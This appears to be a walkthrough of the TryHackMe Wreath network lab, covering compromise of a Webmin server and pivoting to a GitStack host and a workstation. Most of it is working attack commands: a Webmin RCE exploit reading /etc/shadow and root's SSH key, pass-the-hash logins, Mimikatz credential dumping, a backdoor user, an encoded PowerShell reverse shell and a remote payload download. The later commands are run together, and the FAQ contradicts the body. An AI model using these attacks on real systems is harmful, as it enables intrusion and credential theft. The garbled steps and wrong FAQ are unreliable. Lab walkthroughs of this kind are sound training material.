TryHackMe Wreath Network Walkthrough helps you learn how to pivot through a network by compromising a public-facing web machine and tunneling your traffic to access other machines in Wreath’s network. (Streak limitation only for non-subscribed users).
Access Wreath Network
Go to https://tryhackme.com/access?type=networks and download your VPN config file.
TryHackMe Wreath Walkthrough
TryHackMe Wreath Network
- Read the room description and objectives carefully: Before you start the room, take the time to read the room description and objectives carefully. This will give you a good idea of what you need to accomplish and what skills you will need to use.
- Take notes: As you work through the room, it can be helpful to take notes on the tools, techniques, and commands that you use. This can help you remember important details and troubleshoot any issues that arise.
- Use a web proxy: A web proxy such as Burp Suite can be very helpful for intercepting and modifying web traffic, which can help you identify and exploit vulnerabilities in the Wreath web application.
- Look for vulnerabilities: The Wreath web application contains several vulnerabilities that you will need to identify and exploit in order to complete the room. Look for clues in the web page source code, try various input values, and use web application security scanners such as OWASP ZAP to help you find vulnerabilities.
- Research: If you’re stuck on a particular step, don’t be afraid to do some research. Try searching for solutions to similar problems or vulnerabilities online, or look for documentation on the tools and techniques that you’re using.
Remember, the most important thing is to approach the room with a willingness to learn and a willingness to try new things. Don’t be discouraged if you encounter obstacles along the way – these are all opportunities to learn and improve your skills!
Let’s Hack!
Before starting let’s create a folder to store all our files.
mkdir /home/kali/TryHackMe_WreathEnter the project folder:
cd /home/kali/TryHackMe_WreathAttacking Prod-Server
The production server is a Linux host let’s use nmap to scan for open ports and verify what services are running.
Scan the Host
Scan the prod-server using nmap and verify services running on remote machine.
nmap -sC -sV --script=vuln 10.200.193.200
Interesting result the server is running an old WebAdmin version on port 10000.
Open Google and search exploit for Web Admin
search webadmin 1.890Download Exploit from here:
WebMin-1.890-Exploit-unauthorized-RCE
Exploit WebAdmin 1.890 arguments options:
Execute the python script and verify the system process and user.
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "id;whoami"
After verifying we are root let’s work to get remote access on the machine, execute the same script but now reading the /etc/passwd file:
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/passwd"
Now we have a list of system users we can use, notice the user twreath what is his password hash?
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/shadow"
Great we have two user password hashes, let’s crack them.
root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1
twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg
Save both at password_hashes.txt
Crack The Hashes
Passing the hash file into john without more arguments john will auto detect the encryption type.
john passwds_hashes.txtVerify if john crack any password:
john --showNo success cracking the hashes?
If it was possible to read shadow file maybe it is possible to extract the root SSH RSA private key, let’s try it!
Extract SSH Keys
Root SSH RSA Key
python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /root/.ssh/id_rsa"
copy the key content into the file prod-server.rsa and define the correct permissions
chmod 6000 prod-server.rsa
Login In into Prod-Server
Now we can log in into our production server, here I will connect through SSH creating a socks5 proxy on port 19850. This proxy will allow us to access all networks and hosts prod-server can access.
ssh -i /home/kali/Wreath/prod-server.rsa root@10.200.193.200 -D 19850
We are In as root 😀
Attack Prod-Server Description
We start scanning the host prod-server with nmap and detect a vulnerable version of WebAdmin running on port 10000. Then we search for a public exploit on google and use it to get an RCE on remote server, with the script we were able to extract the root SSH RSA Key and login as root into the prod-server and create a socks5 proxy.
Attacking Git Server
It’s time to attack the git Server but before that let’s configure our proxychains to be able to use any tool against git-server.
If you want to use proxychains strict mode comment the socks4 entry and add only Socks5.
sudo echo "socks5 127.0.0.1 19850" >> /etc/proxychains4.conf
An SSH Proxy tunnel can give us a lot of flexibility when we are pivoting inside a network we can keep a secure tunnel between our compromised machines and access any service on the network.
If we want to access git server directly from out browser we need to setup FoxyProxy to use our new socks5 proxy created with SSH tunnel.
Now we can access the Git Server directly in our browser.
Remember any tool we use to attack the Git Server we need to use our local Socks5 proxy (127.0.0.1:19850) created with our SSH Tunnel into prod-server host.
After configuring the FoxyProxy to use our proxy open the git server IP on browser.
http://10.200.193.150We will have an error page but notice have some juice info, it is using Django and mentioned some new directories. Let’s investigate it!
http://10.200.193.150/gitstackScan Git Server with Nmap
proxychains4 nmap 10.200.193.150 --top-ports 1023 -sT -n -PS --script=vuln
As we know gitstack is running on port 80, let’s search for an exploit using searchsploit tool.
searchsploit gitstack
We found 3 possible GitStack exploits, let’s copy the third one into our current folder:
searchsploit -m php/webapps/43777.pymv 43777.py exploit_GitStack.pyproxychains4 python exploit_GitStack.pyproxychains4 curl -X POST http://10.200.193.150/rest/user/ -d 'username=RFS;password=RFS'proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i 10.200.193.150proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Admnistrator -H 37db63-RFS-a8461e05c-RFS -i 10.200.193.150proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/sharefirewall-cmd --zone=public --add-port 19850/tcp
firewall-cmd --zone=public --add-port 19851/tcpscp -i key socat root@10.200.193.200:/tmp./tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:10.50.190.121:19851proxychains4 curl -X POST http://10.200.193.150/web/exploit.php -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'mkdir /home/kali/TryHackMe_Wreath/shareproxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/shareSend Mimikatz through file share or SCP
privilege::debug
token::elevate
lsadump::samproxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=whoami'proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=net user RFS RFS /add'Maintend
Attacking WREATH-PC
http://10.200.193.100http://10.200.193.100/resourcesUsername: Thomas
Password - Crack the Hashpowershell.exe -c "(new-object
System.Net.WebClient).DownloadFile('http://10.50.190.121/PrintSpoofer64-rfs.exe','C:\xampp\htdocs\resources\uploads\PrintSpoofer64-rfs.exe')What is the Wreath room on TryHackMe?
Wreath is a beginner-level room on TryHackMe that focuses on web application security and vulnerability exploitation. The room is designed to help users develop their skills in identifying and exploiting common web application vulnerabilities such as SQL injection, cross-site scripting (XSS), and file inclusion vulnerabilities.
Do I need any prior knowledge or experience to complete the Wreath room?
The Wreath room is designed for beginners, so you don’t need any prior knowledge or experience in web application security or vulnerability exploitation. However, it may be helpful to have a basic understanding of web technologies such as HTML, CSS, and JavaScript, as well as some experience using a Linux command line.
What tools do I need to complete the Wreath room?
You’ll need a web browser, a text editor, and a Linux-based virtual machine such as VirtualBox or VMware. You may also want to use web application security tools such as OWASP ZAP or Burp Suite to help you identify and exploit vulnerabilities in the Wreath web application.
Can I get stuck in the Wreath room?
Yes, it’s possible to get stuck on some of the tasks in the Wreath room, especially if you’re new to web application security and vulnerability exploitation. However, there are many resources available to help you, such as online forums, documentation, and tutorials. You can also reach out to the TryHackMe community for assistance.
Can I work on the Wreath room with others?
Yes, you can work on the Wreath room with others by creating a team or joining an existing team on the TryHackMe platform. This can be a great way to learn from others and share your knowledge and skills.
What should I do after completing the Wreath room?
After completing the Wreath room, you can continue to develop your skills in web application security and vulnerability exploitation by working on other TryHackMe rooms, participating in online forums and communities, and exploring additional resources such as online courses and certifications.